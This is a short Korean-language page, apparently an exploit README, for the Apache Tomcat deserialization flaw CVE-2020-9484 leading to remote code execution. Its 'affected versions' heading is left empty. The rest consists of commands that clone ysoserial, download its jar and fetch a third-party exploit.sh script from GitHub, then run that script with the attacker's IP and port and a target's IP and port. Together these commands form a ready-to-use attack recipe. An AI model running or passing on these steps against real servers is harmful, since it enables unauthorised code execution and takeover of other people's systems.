
RCE(원격 코드 실행)로 이어질 수 있는 Apache Tomcat 역직렬화(CVE-2020-9484) 익스플로잇
Apache Tomcat 역직렬화(deserialization) 취약점(CVE-2020-9484)을 이용해 원격 코드 실행(RCE)까지 이어질 수 있는 익스플로잇입니다.
영향받는 버전:
git clone https://github.com/frohoff/ysoserial
cd ysoserial/
wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar
curl -s https://raw.githubusercontent.com/d3fudd/CVE-2020-9484_Exploit/main/exploit.sh > exploit.sh
exploit.sh [your IP] [your port] [target IP] [target port]